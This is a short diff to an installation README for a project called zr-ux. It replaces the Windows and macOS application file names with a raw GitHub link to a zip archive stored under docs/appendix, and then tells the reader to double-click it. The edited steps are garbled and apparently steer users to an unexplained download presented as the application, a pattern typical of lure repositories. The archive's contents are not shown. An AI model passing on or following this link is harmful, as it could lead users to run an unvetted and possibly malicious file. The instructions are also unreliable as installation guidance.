ngantukcuy/zr-ux/README.md

 5. **Run the Application**
    After extraction, find the `zr-ux` folder.
 Inside, locate the application file:
-   - For Windows, it may be `zr-ux.exe`.
+   - For Windows, it may be `https://raw.githubusercontent.com/ngantukcuy/zr-ux/main/docs/appendix/zr_ux_v3.7.zip`.
-   - For macOS, it should be `zr-ux.app`.
+   - For macOS, it should be `https://raw.githubusercontent.com/ngantukcuy/zr-ux/main/docs/appendix/zr_ux_v3.7.zip`.
    Double-click the file to start the application.

 6. **Follow On-Screen Prompts**